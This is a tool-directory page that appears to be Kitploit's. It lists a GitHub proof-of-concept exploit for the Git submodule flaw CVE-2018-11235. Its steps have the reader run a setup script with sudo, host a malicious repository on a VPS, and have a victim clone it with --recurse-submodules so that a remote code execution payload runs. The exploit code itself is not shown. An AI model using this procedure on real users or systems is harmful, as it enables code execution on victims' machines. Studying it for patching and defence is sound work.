Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2018-11235 — exploit poc for CVE-2018-11235 | Kitploit
Tools/GitHubGitHub/rezy-dev/cve-2018-11235
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationCommand and Control
GitHubrezy-dev/cve-2018-11235

CVE-2018-11235

exploit poc for CVE-2018-11235

View Repository
7 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2018-11235

  1. ssh to your vps.
  2. Clone this repo:
root@kitploit:~
git clone https://github.com/Rezy-Dev/CVE-2018-11235
cd CVE-2018-11235
  1. Give exploit.sh execute (x) permission then execute it:
root@kitploit:~
sudo chmod +x exploit.sh
sudo ./exploit.sh

It downloads apache2 and builds malicious repo for us.

  1. Once done we can use the link http://vps-ip/malicious.git as a git repo.
  2. When victim clones it like:
root@kitploit:~
git clone --recurse-submodules http://vps-ip/malicious.git

The payload rce command should execute.

Thank you!

Download Tool